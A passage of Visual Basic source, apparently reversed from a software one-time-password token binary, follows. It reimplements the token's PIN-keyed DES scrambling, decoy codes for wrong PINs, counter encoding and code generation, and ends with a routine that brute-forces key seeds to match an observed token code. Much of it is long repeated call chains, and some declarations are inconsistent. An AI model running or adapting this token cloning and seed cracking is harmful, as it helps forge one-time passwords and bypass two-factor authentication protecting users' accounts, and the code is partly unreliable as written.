' 10001655:   ScrambleXOR1Pin(PushesSubTable01, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable02, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable03, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable04, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable05, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable06, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable07, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable08, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable09, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable0A, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable0B, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable0C, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable0D, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable0E, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable0F, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable10, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, False)

PinDeScrambledAfterXor = DeScrambleOddEvenPinArray(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2)                 ' 10001810

HexDecodedPart = BitBytesToHex(PinDeScrambledAfterXor, 8)      ' 10001A90

Array.Copy(HexDecodedPart, 0, HexDecodedFull, I * 8, 8) Next

End If

EncryptDecryptToken = HexDecodedFull End Function

Public Function EncryptPinDES(ByVal PinCode As String, ByVal KeyArray As Byte, ByVal PushesDirection As Byte) As Byte          ' 10001CB0    (KEY, PIN, Result) Dim PIN_Source(-1) As Byte Dim FinalEncryptedPIN(-1) As Byte Dim BitBytePin(-1) As Byte

Dim ScrambledBitBytePIN_P1 As Byte Dim ScrambledBitBytePIN_P2 As Byte Dim ScrambledBitBytePIN_P3 As Byte

Dim PinScramblingXORedResult(&H30 - 1) As Byte Dim PinScrambledDecodedResult(&H8 - 1) As Byte Dim PinDeScrambledAfterXor(-1) As Byte

Dim ShrKey(-1) As Byte Dim ScrambledKey(-1) As Byte

ShrKey = GenerateByteShiftArray(KeyArray, 8, True)                         ' 1000119A ScrambledKey = GenerateScrambled1Array(ShrKey)                             ' 100011CE BuildPushesTables(ScrambledKey, PushesDirection)                                          ' 1000120D

PIN_Source = GeneratePinSourceString(PinCode, KeyArray, 8)

BitBytePin = GenerateByteShiftArray(PIN_Source, 8, False)                  ' 100011CE ScramblePINBitArray(BitBytePin, ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, ScrambledBitBytePIN_P3)       ' 10001650

' 10001655: ScrambleXOR1Pin(PushesSubTable01, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable02, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable03, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable04, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable05, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable06, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable07, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable08, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable09, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable0A, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable0B, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable0C, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable0D, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable0E, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable0F, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable10, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, False)

PinDeScrambledAfterXor = DeScrambleOddEvenPinArray(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2)                     ' 10001810 FinalEncryptedPIN = HexDecodeBitArray(PinDeScrambledAfterXor, 4, 8)      ' 10001580

XorArrays(FinalEncryptedPIN, PIN_Source, False)                          ' 10001D50 ' Encryption Phase-1 completed...

EncryptPinDES = FinalEncryptedPIN End Function

Public Function EncryptPinDES(ByVal PinCode As Byte, ByVal KeyArray As Byte, ByVal PushesDirection As Byte) As Byte          ' 10001CB0    (KEY, PIN, Result) Dim PIN_Source(-1) As Byte Dim FinalEncryptedPIN(-1) As Byte Dim BitBytePin(-1) As Byte

Dim ScrambledBitBytePIN_P1 As Byte Dim ScrambledBitBytePIN_P2 As Byte Dim ScrambledBitBytePIN_P3 As Byte

Dim PinScramblingXORedResult(&H30 - 1) As Byte Dim PinScrambledDecodedResult(&H8 - 1) As Byte Dim PinDeScrambledAfterXor(-1) As Byte

Dim ShrKey(-1) As Byte Dim ScrambledKey(-1) As Byte

ShrKey = GenerateByteShiftArray(KeyArray, 8, True)                         ' 1000119A ScrambledKey = GenerateScrambled1Array(ShrKey)                             ' 100011CE BuildPushesTables(ScrambledKey, PushesDirection)                                          ' 1000120D

PIN_Source = GeneratePinSourceString(PinCode, KeyArray, 8)

BitBytePin = GenerateByteShiftArray(PIN_Source, 8, False)                  ' 100011CE ScramblePINBitArray(BitBytePin, ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, ScrambledBitBytePIN_P3)       ' 10001650

' 10001655: ScrambleXOR1Pin(PushesSubTable01, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable02, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable03, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable04, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable05, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable06, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable07, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable08, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable09, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable0A, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable0B, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable0C, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable0D, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable0E, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, True) ScrambleXOR1Pin(PushesSubTable0F, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, True) ScrambleXOR1Pin(PushesSubTable10, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, False)

PinDeScrambledAfterXor = DeScrambleOddEvenPinArray(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2)                     ' 10001810 FinalEncryptedPIN = HexDecodeBitArray(PinDeScrambledAfterXor, 4, 8)      ' 10001580

XorArrays(FinalEncryptedPIN, PIN_Source, False)                          ' 10001D50 ' Encryption Phase-1 completed...

EncryptPinDES = FinalEncryptedPIN End Function

Private Function Build3DESCode(ByVal PinCode As String, ByVal DES1_Key As Byte, ByVal DES2_Key As Byte, ByVal DES3_Key As Byte) As Byte        ' 10001D80 (EAX=Dest, EBX=Key) Dim Final3DESCode(-1) As Byte

Dim DES_Pin1 As Byte = EncryptPinDES(PinCode, DES1_Key, 0) Dim DES_Pin2 As Byte = EncryptPinDES(PinCode, DES2_Key, 0) Dim DES_Pin3 As Byte = EncryptPinDES(PinCode, DES3_Key, 0)

Dim I, ArrayLength As Integer

ArrayLength = UBound(DES_Pin1) If ArrayLength > UBound(DES_Pin2) Then ArrayLength = UBound(DES_Pin2) If ArrayLength > UBound(DES_Pin3) Then ArrayLength = UBound(DES_Pin3)

If ArrayLength > 0 Then ReDim Final3DESCode(ArrayLength)

For I = 0 To ArrayLength Final3DESCode(I) = DES_Pin1(I) Xor DES_Pin2(I) Xor DES_Pin3(I) Next End If

Build3DESCode = Final3DESCode End Function

Private Function GetCodeWeight(ByVal Code As Byte) As Byte Dim B As Byte

If Code = Nothing Then Code = 0

B = CodeWeightTable(Code * 2)

B = B And &H80

GetCodeWeight = B End Function

Public Function GetEncryptedCounter(ByVal Counter As Integer) As Byte Dim TempBuffer(8 - 1) As Byte Dim I As Integer Dim B As Byte

' From a 1A,2B,3C,4D location, Result => A1 B2 CA 1B 2C -> Repeat (i.e. Froming bytes from nibbles A 1 B 2 C, repeat)

TempBuffer(0) = ((Counter And &HF) << &H4) Or ((Counter And &HF0) >> &H4) TempBuffer(1) = ((Counter And &HF00) >> &H4) Or ((Counter And &HF000) >> &HC) TempBuffer(2) = ((Counter And &HF0000) >> &HC) Or ((Counter And &HF)) TempBuffer(3) = ((Counter And &HF0)) Or ((Counter And &HF00) >> &H8) TempBuffer(4) = ((Counter And &HF000) >> &H8) Or ((Counter And &HF0000) >> &H10)

' repeating the above to complete the array... TempBuffer(5) = ((Counter And &HF) << &H4) Or ((Counter And &HF0) >> &H4) TempBuffer(6) = ((Counter And &HF00) >> &H4) Or ((Counter And &HF000) >> &HC) TempBuffer(7) = ((Counter And &HF0000) >> &HC) Or ((Counter And &HF))

GetEncryptedCounter = TempBuffer End Function

Public Function GenerateUserToken(ByVal PinCode As String, ByVal TokenCounter As Integer, ByVal TokenLength As Integer, ByRef DecryptedKey As String, ByVal Host As Byte) As String Dim I As Integer Dim B As Byte Dim TokenHexCharLength As Integer = 0 Dim CodeAuthentic As Boolean = True

Dim DES3Code As Byte = Build3DESCode(PinCode, Key1_Enigma, Key2_Source, Key3_Logic) Dim TokenHexCharCode As Byte = EncryptDecryptToken(DES3Code, OriginalSoftToken, &H20, 1)

Dim FinalGeneratedToken(5) As Byte Dim FinalTokenDisplay As String

Dim EncryptedToken_DES1 As Byte Dim EncryptedToken_DES2 As Byte

I = 0 TokenHexCharLength = 0 CodeAuthentic = True Do  B = GetCodeWeight(TokenHexCharCode(I)) If B <> 0 Then TokenHexCharLength = TokenHexCharLength + 1 Else ' It only means that this is an invalid code to unlock the token, and therefore, we are generating a new DECOY one... CodeAuthentic = False End If

I = I + 1 Loop Until B = 0 Or TokenHexCharCode(I) = 0 Or I > UBound(TokenHexCharCode) Or TokenHexCharLength >= &H20

If CodeAuthentic Then ReDim Preserve TokenHexCharCode(TokenHexCharLength - 1)

Else Dim PinDes1 As Byte = EncryptPinDES(PinCode, Key4_Source, 0) Dim PinDes2 As Byte = EncryptPinDES(PinCode, Key2_Source, 0) Dim PinDes3 As Byte = EncryptPinDES(PinCode, Key3_Logic, 0)

ReDim TokenHexCharCode(UBound(PinDes1))

' 10001ECF: For I = 0 To Int(UBound(CodeScramblingFinal1) / 2) B = CodeScramblingFinal1((I * 2) + 1)

If CodeScramblingFinal1(I * 2) = 1 Then TokenHexCharCode(I) = PinDes1(B) ElseIf CodeScramblingFinal1(I * 2) = 2 Then TokenHexCharCode(I) = PinDes2(B) End If  Next

' 10001EFE: XorArrays(TokenHexCharCode, PinDes3, False)                          ' 10001D50 ' To this stage, if the PIN has entered correctly, the result is always the following: '  ' 0x0013EFC0  36 43 37 41 30 46 37 34 30 39 37 32 36 36 00 00  6C7A0F74097266.. '  ' Otherwise, if "0000" and it's not a match then it would be: '  ' 0x0013EFC0  35 39 34 36 30 30 37 31 42 33 42 38 35 33 00 53  59460071B3B853.S   ' ' Which tells me that the Token/file itself has the PIN scrambled there inside somewhere...

Dim BadTokenCode As String = Hex2Char(TokenHexCharCode, 14) ReDim TokenHexCharCode(Len(BadTokenCode) - 1)

For I = 1 To Len(BadTokenCode) TokenHexCharCode(I - 1) = Asc(Mid(BadTokenCode, I, 1)) Next End If

' Needs to be checked on location 100023FA, where it's adding 1 into the last byte only i.e. "66" to become "67" from the generated string above!

TokenHexCharCode(UBound(TokenHexCharCode)) = TokenHexCharCode(UBound(TokenHexCharCode)) + 1

Dim TokenCode As Byte = ConverHexCharsIntoByteArray(TokenHexCharCode) 'key56Bit[6] = (byte)(key56Bit[6] + (byte)hostNum & 0xf | tmp & 0xf0); 'TokenCode(6) = TokenCode(6) + ((Host And &HF) Or (TokenCode(6) And &HF0)) Dim Token7to8 As Byte = Convert7to8ByteArray(TokenCode)

'Console.Write("Using Code: " & Hex2Char(TokenCode, 14) & ": ") DecryptedKey = Hex2Char(TokenCode, 14)

If TokenCode.Length < 8 Then Do   I = 0 ReDim Preserve TokenCode(UBound(TokenCode) + 1) TokenCode(UBound(TokenCode)) = TokenCode(I) I = I + 1 Loop Until TokenCode.Length >= 8 End If

Dim EncryptedCounter As Byte = GetEncryptedCounter(TokenCounter)

EncryptedToken_DES1 = EncryptDecryptToken(Token7to8, EncryptedCounter, 8, 0)

TokenCode(0) = ((EncryptedToken_DES1(0) Xor TokenCode(0)) And &HF) Xor EncryptedToken_DES1(0)

'FinalGeneratedToken(0) = (EncryptedToken_DES1(0) And &HF0) >> 4 FinalGeneratedToken(0) = (TokenCode(0) And &HF0) >> 4

TokenCounter = TokenCounter + 1 Dim EncryptedCounterPlus As Byte = GetEncryptedCounter(TokenCounter)

For I = 0 To 3 EncryptedToken_DES2 = EncryptDecryptToken(Token7to8, TokenCode, 8, 0)

B = (EncryptedToken_DES2(0) Xor EncryptedCounterPlus(I)) Array.Copy(TokenCode, 1, TokenCode, 0, 7) TokenCode(7) = B

FinalGeneratedToken(I + 1) = B Next ' CheckPoint: Results of this stage matches the results from 100024EB...

Dim HB As String

FinalTokenDisplay = Hex(FinalGeneratedToken(0))

For I = 1 To UBound(FinalGeneratedToken) HB = UCase(Hex(FinalGeneratedToken(I))) If Len(HB) < 2 Then HB = "0" & HB

FinalTokenDisplay = FinalTokenDisplay & HB Next

FinalTokenDisplay = FinalTokenDisplay.Replace("D", "P") FinalTokenDisplay = FinalTokenDisplay.Replace("B", "H")

GenerateUserToken = Mid(FinalTokenDisplay, 1, TokenLength) End Function

Public Function GenerateTokenFromKey(ByVal SourceKey As Long, ByVal TokenCounter As Integer, ByVal Host As Byte, ByVal AlgoVer As Integer, ByVal Debug As Boolean) As Integer ' Same as GenerateUserToken above, but without decoding the string using a PIN:

Dim I As Integer Dim B As Byte Dim FinalHexToken As Integer = 0

Dim EncryptedToken_DES1 As Byte Dim EncryptedToken_DES2 As Byte Dim S, HostDisplacement As String

Dim WorkingByte As Integer = 0

B = SourceKey And &HFF I = B B = ((I + Host) And &HF) Or (I And &HF0) SourceKey = (SourceKey And &HFFFFFFFFFFFF00) Or B

If AlgoVer = 1 Then WorkingByte = 0 Else WorkingByte = 7 End If

Dim OriginalToken As Byte = _ { _      (SourceKey >> &H30) And &HFF _ , (SourceKey >> &H28) And &HFF _ , (SourceKey >> &H20) And &HFF _ , (SourceKey >> &H18) And &HFF _ , (SourceKey >> &H10) And &HFF _ , (SourceKey >> &H8) And &HFF _ , (SourceKey >> &H0) And &HFF _ }

HostDisplacement = Hex(SourceKey) HostDisplacement = Mid("00000000000000", 1, 14 - Len(HostDisplacement)) & HostDisplacement

HostDisplacement = Mid(HostDisplacement & HostDisplacement, Host, 16) Dim EncryptionKey As Long = 0

Dim TokenCode As Byte = ConvertHexStringToBytes(HostDisplacement)

Dim Token7to8 As Byte = Convert7to8ByteArray(OriginalToken) Dim EncryptedCounter As Byte = GetEncryptedCounter(TokenCounter)

EncryptedToken_DES1 = EncryptDecryptToken(Token7to8, EncryptedCounter, 8, 0)

If Debug Then Console.Write("ToC: " & Hex2Char(TokenCode, 16) & ", ") Console.Write("728: " & Hex2Char(Token7to8, 16) & ", ") Console.Write("Cnt1: " & Hex2Char(EncryptedCounter, 16) & ", ") Console.Write("DES1: " & Hex2Char(EncryptedToken_DES1, 16) & ", ") End If

TokenCode(WorkingByte) = ((EncryptedToken_DES1(0) Xor TokenCode(WorkingByte)) And &HF) Xor EncryptedToken_DES1(0)

FinalHexToken = (TokenCode(WorkingByte) And &HF0) >> 4

TokenCounter = TokenCounter + 1 Dim EncryptedCounterPlus As Byte = GetEncryptedCounter(TokenCounter)

If Debug Then Console.Write("Cnt2: " & Hex2Char(EncryptedCounterPlus, 16) & ", ")

For I = 0 To 2   '3 EncryptedToken_DES2 = EncryptDecryptToken(Token7to8, TokenCode, 8, 0)

If Debug Then Console.Write("DES" & I + 2 & ": " & Hex2Char(EncryptedToken_DES2, 16) & ", ")

B = (EncryptedToken_DES2(0) Xor EncryptedCounterPlus(I)) Array.Copy(TokenCode, 1, TokenCode, 0, 7) TokenCode(7) = B

'If I < 3 Then FinalHexToken = (FinalHexToken << 8) + B  FinalHexToken = (FinalHexToken << 8) + B  Next

GenerateTokenFromKey = FinalHexToken >> 4 End Function

Private Sub BruteForceKey(ByRef EncKeySeedStart As Long, ByVal EncKeySeedEnd As Long, ByVal TokenToCompare As String, ByVal TrialsPerKey As Integer, ByVal Host As Integer) Dim KeyCounter As Long Dim EncKeySeed(7) As Byte Dim I As Integer Dim TokenCheck As Integer Dim TokenToCompareHex As Integer

Dim TimeElapsed As Date

Do  TokenToCompare = TokenToCompare.Replace("H", "B") TokenToCompare = TokenToCompare.Replace("P", "D") Loop While InStr(TokenToCompare, "P") > 0 Or InStr(TokenToCompare, "H") > 0

TokenToCompareHex = Val("&H" & TokenToCompare)

TimeElapsed = Now Console.WriteLine(Format(TimeElapsed.Now, "dd/MMM/yyyy") & " " & Format(TimeElapsed.Now, "HH:mm:ss") & ":" & Format(TimeElapsed.Millisecond, "000") & " BruteForce: Started") Console.WriteLine

For KeyCounter = EncKeySeedStart To EncKeySeedEnd Console.Write(".") 'EncKeySeed(6) = (KeyCounter >> &H0) And &HFF 'EncKeySeed(5) = (KeyCounter >> &H8) And &HFF 'EncKeySeed(4) = (KeyCounter >> &H10) And &HFF 'EncKeySeed(3) = (KeyCounter >> &H18) And &HFF 'EncKeySeed(2) = (KeyCounter >> &H20) And &HFF 'EncKeySeed(1) = (KeyCounter >> &H28) And &HFF 'EncKeySeed(0) = (KeyCounter >> &H30) And &HFF

'EncKeySeed(7) = (KeyCounter >> &H30) And &HFF      ' Repeating the same key, same as original, but doing it here rather than inside the docoder to speed it up...

For I = 0 To TrialsPerKey 'TokenCheck = GenerateTokenFromKey(EncKeySeed.Clone, I, 1) TokenCheck = GenerateTokenFromKey(KeyCounter, I, Host, 1, False)

If TokenToCompareHex = TokenCheck Then Console.WriteLine Console.WriteLine("Key Matched: " & Hex(KeyCounter - 1) & ", Index: " & I)   End If   Next Next

Console.WriteLine Console.WriteLine(Format(Now.Now, "dd/MMM/yyyy") & " " & Format(Now.Now, "HH:mm:ss") & ":" & Format(Now.Millisecond, "000") & " BruteForce: Ended") Console.WriteLine("Time Elapsed: " & DateDiff(DateInterval.Second, TimeElapsed, Now) & " Seconds") End Sub

End Module